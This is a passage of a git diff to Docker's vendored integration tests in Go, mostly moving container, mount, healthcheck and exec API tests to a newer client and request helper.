"test5", ReadOnly: true, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, + expected: types.MountPoint{Type: "volume", Name: "test5", RW: false, Destination: destPath, Mode: selinuxSharedLabel}, + }, }...) } @@ -1866,96 +2066,142 @@ func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) { type createResp struct { ID string `json:"Id"` } - for i, x := range cases { - c.Logf("case %d - config: %v", i, x.cfg) - status, data, err := sockRequest("POST", "/containers/create", wrapper{containertypes.Config{Image: testImg}, containertypes.HostConfig{Mounts: []mounttypes.Mount{x.cfg}}}) - c.Assert(err, checker.IsNil, check.Commentf(string(data))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(data))) - - var resp createResp - err = json.Unmarshal(data, &resp) - c.Assert(err, checker.IsNil, check.Commentf(string(data))) - id := resp.ID - - var mps []types.MountPoint - err = json.NewDecoder(strings.NewReader(inspectFieldJSON(c, id, "Mounts"))).Decode(&mps) - c.Assert(err, checker.IsNil) - c.Assert(mps, checker.HasLen, 1) - c.Assert(mps[0].Destination, checker.Equals, x.expected.Destination) - if len(x.expected.Source) > 0 { - c.Assert(mps[0].Source, checker.Equals, x.expected.Source) + ctx := context.Background() + apiclient := testEnv.APIClient() + for i, x := range cases { + c.Logf("case %d - config: %v", i, x.spec) + container, err := apiclient.ContainerCreate( + ctx, + &containertypes.Config{Image: testImg}, + &containertypes.HostConfig{Mounts: []mounttypes.Mount{x.spec}}, + &networktypes.NetworkingConfig{}, + "") + assert.NilError(c, err) + + containerInspect, err := apiclient.ContainerInspect(ctx, container.ID) + assert.NilError(c, err) + mps := containerInspect.Mounts + assert.Assert(c, is.Len(mps, 1)) + mountPoint := mps[0] + + if x.expected.Source != "" { + assert.Check(c, is.Equal(x.expected.Source, mountPoint.Source)) } - if len(x.expected.Name) > 0 { - c.Assert(mps[0].Name, checker.Equals, x.expected.Name) + if x.expected.Name != "" { + assert.Check(c, is.Equal(x.expected.Name, mountPoint.Name)) } - if len(x.expected.Driver) > 0 { - c.Assert(mps[0].Driver, checker.Equals, x.expected.Driver) + if x.expected.Driver != "" { + assert.Check(c, is.Equal(x.expected.Driver, mountPoint.Driver)) } - c.Assert(mps[0].RW, checker.Equals, x.expected.RW) - c.Assert(mps[0].Type, checker.Equals, x.expected.Type) - c.Assert(mps[0].Mode, checker.Equals, x.expected.Mode) - if len(x.expected.Propagation) > 0 { - c.Assert(mps[0].Propagation, checker.Equals, x.expected.Propagation) + if x.expected.Propagation != "" { + assert.Check(c, is.Equal(x.expected.Propagation, mountPoint.Propagation)) } - - out, _, err := dockerCmdWithError("start", "-a", id) - if (x.cfg.Type != "volume" || (x.cfg.VolumeOptions != nil && x.cfg.VolumeOptions.NoCopy)) && daemonPlatform != "windows" { - c.Assert(err, checker.NotNil, check.Commentf("%s\n%v", out, mps[0])) - } else { - c.Assert(err, checker.IsNil, check.Commentf("%s\n%v", out, mps[0])) + assert.Check(c, is.Equal(x.expected.RW, mountPoint.RW)) + assert.Check(c, is.Equal(x.expected.Type, mountPoint.Type)) + assert.Check(c, is.Equal(x.expected.Mode, mountPoint.Mode)) + assert.Check(c, is.Equal(x.expected.Destination, mountPoint.Destination)) + + err = apiclient.ContainerStart(ctx, container.ID, types.ContainerStartOptions{}) + assert.NilError(c, err) + poll.WaitOn(c, containerExit(apiclient, container.ID), poll.WithDelay(time.Second)) + + err = apiclient.ContainerRemove(ctx, container.ID, types.ContainerRemoveOptions{ + RemoveVolumes: true, + Force: true, + }) + assert.NilError(c, err) + + switch { + + // Named volumes still exist after the container is removed + case x.spec.Type == "volume" && len(x.spec.Source) > 0: + _, err := apiclient.VolumeInspect(ctx, mountPoint.Name) + assert.NilError(c, err) + + // Bind mounts are never removed with the container + case x.spec.Type == "bind": + + // anonymous volumes are removed + default: + _, err := apiclient.VolumeInspect(ctx, mountPoint.Name) + assert.Check(c, client.IsErrNotFound(err)) } + } +} - dockerCmd(c, "rm", "-fv", id) - if x.cfg.Type == "volume" && len(x.cfg.Source) > 0 { - // This should still exist even though we removed the container - dockerCmd(c, "volume", "inspect", mps[0].Name) - } else { - // This should be removed automatically when we removed the container - out, _, err := dockerCmdWithError("volume", "inspect", mps[0].Name) - c.Assert(err, checker.NotNil, check.Commentf(out)) +func containerExit(apiclient client.APIClient, name string) func(poll.LogT) poll.Result { + return func(logT poll.LogT) poll.Result { + container, err := apiclient.ContainerInspect(context.Background(), name) + if err != nil { + return poll.Error(err) + } + switch container.State.Status { + case "created", "running": + return poll.Continue("container %s is %s, waiting for exit", name, container.State.Status) } + return poll.Success() } } func (s *DockerSuite) TestContainersAPICreateMountsTmpfs(c *check.C) { testRequires(c, DaemonIsLinux) type testCase struct { - cfg map[string]interface{} + cfg mounttypes.Mount expectedOptions []string } target := "/foo" cases := []testCase{ { - cfg: map[string]interface{}{ - "Type": "tmpfs", - "Target": target}, + cfg: mounttypes.Mount{ + Type: "tmpfs", + Target: target}, expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime"}, }, { - cfg: map[string]interface{}{ - "Type": "tmpfs", - "Target": target, - "TmpfsOptions": map[string]interface{}{ - "SizeBytes": 4096 * 1024, "Mode": 0700}}, + cfg: mounttypes.Mount{ + Type: "tmpfs", + Target: target, + TmpfsOptions: &mounttypes.TmpfsOptions{ + SizeBytes: 4096 * 1024, Mode: 0700}}, expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime", "size=4096k", "mode=700"}, }, } + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"/bin/sh", "-c", fmt.Sprintf("mount | grep 'tmpfs on %s'", target)}, + } for i, x := range cases { cName := fmt.Sprintf("test-tmpfs-%d", i) - data := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"/bin/sh", "-c", - fmt.Sprintf("mount | grep 'tmpfs on %s'", target)}, - "HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{x.cfg}}, + hostConfig := containertypes.HostConfig{ + Mounts: []mounttypes.Mount{x.cfg}, } - status, resp, err := sockRequest("POST", "/containers/create?name="+cName, data) - c.Assert(err, checker.IsNil, check.Commentf(string(resp))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp))) + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, cName) + c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", cName) for _, option := range x.expectedOptions { c.Assert(out, checker.Contains, option) } } } + +// Regression test for #33334 +// Makes sure that when a container which has a custom stop signal + restart=always +// gets killed (with SIGKILL) by the kill API, that the restart policy is cancelled. +func (s *DockerSuite) TestContainerKillCustomStopSignal(c *check.C) { + id := strings.TrimSpace(runSleepingContainer(c, "--stop-signal=SIGTERM", "--restart=always")) + res, _, err := request.Post("/containers/" + id + "/kill") + c.Assert(err, checker.IsNil) + defer res.Body.Close() + + b, err := ioutil.ReadAll(res.Body) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent, check.Commentf(string(b))) + err = waitInspect(id, "{{.State.Running}} {{.State.Restarting}}", "false false", 30*time.Second) + c.Assert(err, checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go new file mode 100644 index 0000000000..c569574de5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go @@ -0,0 +1,76 @@ +// +build windows + +package main + +import ( + "context" + "fmt" + "io/ioutil" + "math/rand" + "strings" + + winio "github.com/Microsoft/go-winio" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func (s *DockerSuite) TestContainersAPICreateMountsBindNamedPipe(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsWindowsAtLeastBuild(16299)) // Named pipe support was added in RS3 + + // Create a host pipe to map into the container + hostPipeName := fmt.Sprintf(`\\.\pipe\docker-cli-test-pipe-%x`, rand.Uint64()) + pc := &winio.PipeConfig{ + SecurityDescriptor: "D:P(A;;GA;;;AU)", // Allow all users access to the pipe + } + l, err := winio.ListenPipe(hostPipeName, pc) + if err != nil { + c.Fatal(err) + } + defer l.Close() + + // Asynchronously read data that the container writes to the mapped pipe. + var b []byte + ch := make(chan error) + go func() { + conn, err := l.Accept() + if err == nil { + b, err = ioutil.ReadAll(conn) + conn.Close() + } + ch <- err + }() + + containerPipeName := `\\.\pipe\docker-cli-test-pipe` + text := "hello from a pipe" + cmd := fmt.Sprintf("echo %s > %s", text, containerPipeName) + name := "test-bind-npipe" + + ctx := context.Background() + client := testEnv.APIClient() + _, err = client.ContainerCreate(ctx, + &container.Config{ + Image: testEnv.PlatformDefaults.BaseImage, + Cmd: []string{"cmd", "/c", cmd}, + }, &container.HostConfig{ + Mounts: []mount.Mount{ + { + Type: "npipe", + Source: hostPipeName, + Target: containerPipeName, + }, + }, + }, + nil, name) + assert.NilError(c, err) + + err = client.ContainerStart(ctx, name, types.ContainerStartOptions{}) + assert.NilError(c, err) + + err = <-ch + assert.NilError(c, err) + assert.Check(c, is.Equal(text, strings.TrimSpace(string(b)))) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go index 41011c3157..8c7fff477e 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go @@ -1,84 +1,136 @@ package main import ( + "fmt" "net/http" + "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) -func (s *DockerSuite) TestAPICreateWithNotExistImage(c *check.C) { - name := "test" +func (s *DockerSuite) TestAPICreateWithInvalidHealthcheckParams(c *check.C) { + // test invalid Interval in Healthcheck: less than 0s + name := "test1" config := map[string]interface{}{ - "Image": "test456:v1", - "Volumes": map[string]struct{}{"/tmp": {}}, + "Image": "busybox", + "Healthcheck": map[string]interface{}{ + "Interval": -10 * time.Millisecond, + "Timeout": time.Second, + "Retries": int(1000), + }, } - status, body, err := sockRequest("POST", "/containers/create?name="+name, config) + res, body, err := request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusNotFound) - expected := "No such image: test456:v1" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) - - config2 := map[string]interface{}{ - "Image": "test456", - "Volumes": map[string]struct{}{"/tmp": {}}, + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) } - status, body, err = sockRequest("POST", "/containers/create?name="+name, config2) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusNotFound) - expected = "No such image: test456:latest" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) + buf, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) - config3 := map[string]interface{}{ - "Image": "sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa", - } + expected := fmt.Sprintf("Interval in Healthcheck cannot be less than %s", container.MinimumDuration) + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) - status, body, err = sockRequest("POST", "/containers/create?name="+name, config3) + // test invalid Interval in Healthcheck: larger than 0s but less than 1ms + name = "test2" + config = map[string]interface{}{ + "Image": "busybox", + "Healthcheck": map[string]interface{}{ + "Interval": 500 * time.Microsecond, + "Timeout": time.Second, + "Retries": int(1000), + }, + } + res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusNotFound) - expected = "No such image: sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) -} + buf, err = request.ReadBody(body) + c.Assert(err, checker.IsNil) -// Test for #25099 -func (s *DockerSuite) TestAPICreateEmptyEnv(c *check.C) { - name := "test1" - config := map[string]interface{}{ - "Image": "busybox", - "Env": []string{"", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, - "Cmd": []string{"true"}, + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) } + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) - status, body, err := sockRequest("POST", "/containers/create?name="+name, config) + // test invalid Timeout in Healthcheck: less than 1ms + name = "test3" + config = map[string]interface{}{ + "Image": "busybox", + "Healthcheck": map[string]interface{}{ + "Interval": time.Second, + "Timeout": -100 * time.Millisecond, + "Retries": int(1000), + }, + } + res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - expected := "invalid environment variable:" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) + } - name = "test2" + buf, err = request.ReadBody(body) + c.Assert(err, checker.IsNil) + + expected = fmt.Sprintf("Timeout in Healthcheck cannot be less than %s", container.MinimumDuration) + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) + + // test invalid Retries in Healthcheck: less than 0 + name = "test4" config = map[string]interface{}{ "Image": "busybox", - "Env": []string{"=", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, - "Cmd": []string{"true"}, + "Healthcheck": map[string]interface{}{ + "Interval": time.Second, + "Timeout": time.Second, + "Retries": int(-10), + }, } - status, body, err = sockRequest("POST", "/containers/create?name="+name, config) + res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - expected = "invalid environment variable: =" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) + } + + buf, err = request.ReadBody(body) + c.Assert(err, checker.IsNil) + + expected = "Retries in Healthcheck cannot be negative" + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) + // test invalid StartPeriod in Healthcheck: not 0 and less than 1ms name = "test3" config = map[string]interface{}{ "Image": "busybox", - "Env": []string{"=foo", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, - "Cmd": []string{"true"}, + "Healthcheck": map[string]interface{}{ + "Interval": time.Second, + "Timeout": time.Second, + "Retries": int(1000), + "StartPeriod": 100 * time.Microsecond, + }, } - status, body, err = sockRequest("POST", "/containers/create?name="+name, config) + res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - expected = "invalid environment variable: =foo" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) + } + + buf, err = request.ReadBody(body) + c.Assert(err, checker.IsNil) + + expected = fmt.Sprintf("StartPeriod in Healthcheck cannot be less than %s", container.MinimumDuration) + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go deleted file mode 100644 index 3891c87379..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go +++ /dev/null @@ -1,73 +0,0 @@ -package main - -import ( - "encoding/json" - "io" - "net/http" - "net/url" - "strconv" - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestEventsAPIEmptyOutput(c *check.C) { - type apiResp struct { - resp *http.Response - err error - } - chResp := make(chan *apiResp) - go func() { - resp, body, err := sockRequestRaw("GET", "/events", nil, "") - body.Close() - chResp <- &apiResp{resp, err} - }() - - select { - case r := <-chResp: - c.Assert(r.err, checker.IsNil) - c.Assert(r.resp.StatusCode, checker.Equals, http.StatusOK) - case <-time.After(3 * time.Second): - c.Fatal("timeout waiting for events api to respond, should have responded immediately") - } -} - -func (s *DockerSuite) TestEventsAPIBackwardsCompatible(c *check.C) { - since := daemonTime(c).Unix() - ts := strconv.FormatInt(since, 10) - - out, _ := runSleepingContainer(c, "--name=foo", "-d") - containerID := strings.TrimSpace(out) - c.Assert(waitRun(containerID), checker.IsNil) - - q := url.Values{} - q.Set("since", ts) - - _, body, err := sockRequestRaw("GET", "/events?"+q.Encode(), nil, "") - c.Assert(err, checker.IsNil) - defer body.Close() - - dec := json.NewDecoder(body) - var containerCreateEvent *jsonmessage.JSONMessage - for { - var event jsonmessage.JSONMessage - if err := dec.Decode(&event); err != nil { - if err == io.EOF { - break - } - c.Fatal(err) - } - if event.Status == "create" && event.ID == containerID { - containerCreateEvent = &event - break - } - } - - c.Assert(containerCreateEvent, checker.Not(checker.IsNil)) - c.Assert(containerCreateEvent.Status, checker.Equals, "create") - c.Assert(containerCreateEvent.ID, checker.Equals, containerID) - c.Assert(containerCreateEvent.From, checker.Equals, "busybox") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go index cf4dded483..2db3d3e317 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go @@ -9,7 +9,9 @@ import ( "strings" "sync" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -19,9 +21,13 @@ func (s *DockerSuite) TestExecResizeAPIHeightWidthNoInt(c *check.C) { cleanedContainerID := strings.TrimSpace(out) endpoint := "/exec/" + cleanedContainerID + "/resize?h=foo&w=bar" - status, _, err := sockRequest("POST", endpoint, nil) + res, _, err := request.Post(endpoint) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } } // Part of #14845 @@ -35,16 +41,19 @@ func (s *DockerSuite) TestExecResizeImmediatelyAfterExecStart(c *check.C) { "Cmd": []string{"/bin/sh"}, } uri := fmt.Sprintf("/containers/%s/exec", name) - status, body, err := sockRequest("POST", uri, data) + res, body, err := request.Post(uri, request.JSONBody(data)) if err != nil { return err } - if status != http.StatusCreated { - return fmt.Errorf("POST %s is expected to return %d, got %d", uri, http.StatusCreated, status) + if res.StatusCode != http.StatusCreated { + return fmt.Errorf("POST %s is expected to return %d, got %d", uri, http.StatusCreated, res.StatusCode) } + buf, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) + out := map[string]string{} - err = json.Unmarshal(body, &out) + err = json.Unmarshal(buf, &out) if err != nil { return fmt.Errorf("ExecCreate returned invalid json. Error: %q", err.Error()) } @@ -55,23 +64,24 @@ func (s *DockerSuite) TestExecResizeImmediatelyAfterExecStart(c *check.C) { } payload := bytes.NewBufferString(`{"Tty":true}`) - conn, _, err := sockRequestHijack("POST", fmt.Sprintf("/exec/%s/start", execID), payload, "application/json") + conn, _, err := sockRequestHijack("POST", fmt.Sprintf("/exec/%s/start", execID), payload, "application/json", daemonHost()) if err != nil { return fmt.Errorf("Failed to start the exec: %q", err.Error()) } defer conn.Close() - _, rc, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/resize?h=24&w=80", execID), nil, "text/plain") - // It's probably a panic of the daemon if io.ErrUnexpectedEOF is returned. - if err == io.ErrUnexpectedEOF { - return fmt.Errorf("The daemon might have crashed.") + _, rc, err := request.Post(fmt.Sprintf("/exec/%s/resize?h=24&w=80", execID), request.ContentType("text/plain")) + if err != nil { + // It's probably a panic of the daemon if io.ErrUnexpectedEOF is returned. + if err == io.ErrUnexpectedEOF { + return fmt.Errorf("The daemon might have crashed.") + } + // Other error happened, should be reported. + return fmt.Errorf("Fail to exec resize immediately after start. Error: %q", err.Error()) } - if err == nil { - rc.Close() - } + rc.Close() - // We only interested in the io.ErrUnexpectedEOF error, so we return nil otherwise. return nil } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go index 716e9ac68f..118f9971a7 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go @@ -4,13 +4,20 @@ package main import ( "bytes" + "context" "encoding/json" "fmt" + "io/ioutil" "net/http" + "os" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -19,12 +26,18 @@ func (s *DockerSuite) TestExecAPICreateNoCmd(c *check.C) { name := "exec_test" dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") - status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": nil}) + res, body, err := request.Post(fmt.Sprintf("/containers/%s/exec", name), request.JSONBody(map[string]interface{}{"Cmd": nil})) + c.Assert(err, checker.IsNil) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) comment := check.Commentf("Expected message when creating exec command with no Cmd specified") - c.Assert(getErrorMessage(c, body), checker.Contains, "No exec command specified", comment) + c.Assert(getErrorMessage(c, b), checker.Contains, "No exec command specified", comment) } func (s *DockerSuite) TestExecAPICreateNoValidContentType(c *check.C) { @@ -36,11 +49,14 @@ func (s *DockerSuite) TestExecAPICreateNoValidContentType(c *check.C) { c.Fatalf("Can not encode data to json %s", err) } - res, body, err := sockRequestRaw("POST", fmt.Sprintf("/containers/%s/exec", name), jsonData, "text/plain") + res, body, err := request.Post(fmt.Sprintf("/containers/%s/exec", name), request.RawContent(ioutil.NopCloser(jsonData)), request.ContentType("test/plain")) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) - - b, err := readBody(body) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) comment := check.Commentf("Expected message when creating exec command with invalid Content-Type specified") @@ -54,16 +70,22 @@ func (s *DockerSuite) TestExecAPICreateContainerPaused(c *check.C) { dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") dockerCmd(c, "pause", name) - status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}}) + + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusConflict) + defer cli.Close() + + config := types.ExecConfig{ + Cmd: []string{"true"}, + } + _, err = cli.ContainerExecCreate(context.Background(), name, config) comment := check.Commentf("Expected message when creating exec command with Container %s is paused", name) - c.Assert(getErrorMessage(c, body), checker.Contains, "Container "+name+" is paused, unpause the container before exec", comment) + c.Assert(err.Error(), checker.Contains, "Container "+name+" is paused, unpause the container before exec", comment) } func (s *DockerSuite) TestExecAPIStart(c *check.C) { - testRequires(c, DaemonIsLinux) // Uses pause/unpause but bits may be salvagable to Windows to Windows CI + testRequires(c, DaemonIsLinux) // Uses pause/unpause but bits may be salvageable to Windows to Windows CI dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") id := createExec(c, "test") @@ -94,7 +116,7 @@ func (s *DockerSuite) TestExecAPIStartEnsureHeaders(c *check.C) { dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") id := createExec(c, "test") - resp, _, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json") + resp, _, err := request.Post(fmt.Sprintf("/exec/%s/start", id), request.RawString(`{"Detach": true}`), request.JSON) c.Assert(err, checker.IsNil) c.Assert(resp.Header.Get("Server"), checker.Not(checker.Equals), "") } @@ -104,10 +126,10 @@ func (s *DockerSuite) TestExecAPIStartBackwardsCompatible(c *check.C) { runSleepingContainer(c, "-d", "--name", "test") id := createExec(c, "test") - resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/v1.20/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "text/plain") + resp, body, err := request.Post(fmt.Sprintf("/v1.20/exec/%s/start", id), request.RawString(`{"Detach": true}`), request.ContentType("text/plain")) c.Assert(err, checker.IsNil) - b, err := readBody(body) + b, err := request.ReadBody(body) comment := check.Commentf("response body: %s", b) c.Assert(err, checker.IsNil, comment) c.Assert(resp.StatusCode, checker.Equals, http.StatusOK, comment) @@ -118,21 +140,7 @@ func (s *DockerSuite) TestExecAPIStartMultipleTimesError(c *check.C) { runSleepingContainer(c, "-d", "--name", "test") execID := createExec(c, "test") startExec(c, execID, http.StatusOK) - - timeout := time.After(60 * time.Second) - var execJSON struct{ Running bool } - for { - select { - case <-timeout: - c.Fatal("timeout waiting for exec to start") - default: - } - - inspectExec(c, execID, &execJSON) - if !execJSON.Running { - break - } - } + waitForExec(c, execID) startExec(c, execID, http.StatusConflict) } @@ -141,36 +149,117 @@ func (s *DockerSuite) TestExecAPIStartMultipleTimesError(c *check.C) { func (s *DockerSuite) TestExecAPIStartWithDetach(c *check.C) { name := "foo" runSleepingContainer(c, "-d", "-t", "--name", name) - data := map[string]interface{}{ - "cmd": []string{"true"}, - "AttachStdin": true, + + config := types.ExecConfig{ + Cmd: []string{"true"}, + AttachStderr: true, } - _, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), data) - c.Assert(err, checker.IsNil, check.Commentf(string(b))) - createResp := struct { - ID string `json:"Id"` - }{} - c.Assert(json.Unmarshal(b, &createResp), checker.IsNil, check.Commentf(string(b))) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - _, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", createResp.ID), strings.NewReader(`{"Detach": true}`), "application/json") + createResp, err := cli.ContainerExecCreate(context.Background(), name, config) c.Assert(err, checker.IsNil) - b, err = readBody(body) + _, body, err := request.Post(fmt.Sprintf("/exec/%s/start", createResp.ID), request.RawString(`{"Detach": true}`), request.JSON) + c.Assert(err, checker.IsNil) + + b, err := request.ReadBody(body) comment := check.Commentf("response body: %s", b) c.Assert(err, checker.IsNil, comment) - resp, _, err := sockRequestRaw("GET", "/_ping", nil, "") + resp, _, err := request.Get("/_ping") c.Assert(err, checker.IsNil) if resp.StatusCode != http.StatusOK { c.Fatal("daemon is down, it should alive") } } +// #30311 +func (s *DockerSuite) TestExecAPIStartValidCommand(c *check.C) { + name := "exec_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + id := createExecCmd(c, name, "true") + startExec(c, id, http.StatusOK) + + waitForExec(c, id) + + var inspectJSON struct{ ExecIDs []string } + inspectContainer(c, name, &inspectJSON) + + c.Assert(inspectJSON.ExecIDs, checker.IsNil) +} + +// #30311 +func (s *DockerSuite) TestExecAPIStartInvalidCommand(c *check.C) { + name := "exec_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + id := createExecCmd(c, name, "invalid") + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + startExec(c, id, http.StatusNotFound) + } else { + startExec(c, id, http.StatusBadRequest) + } + waitForExec(c, id) + + var inspectJSON struct{ ExecIDs []string } + inspectContainer(c, name, &inspectJSON) + + c.Assert(inspectJSON.ExecIDs, checker.IsNil) +} + +func (s *DockerSuite) TestExecStateCleanup(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + // This test checks accidental regressions. Not part of stable API. + + name := "exec_cleanup" + cid, _ := dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + cid = strings.TrimSpace(cid) + + stateDir := "/var/run/docker/containerd/" + cid + + checkReadDir := func(c *check.C) (interface{}, check.CommentInterface) { + fi, err := ioutil.ReadDir(stateDir) + c.Assert(err, checker.IsNil) + return len(fi), nil + } + + fi, err := ioutil.ReadDir(stateDir) + c.Assert(err, checker.IsNil) + c.Assert(len(fi), checker.GreaterThan, 1) + + id := createExecCmd(c, name, "ls") + startExec(c, id, http.StatusOK) + 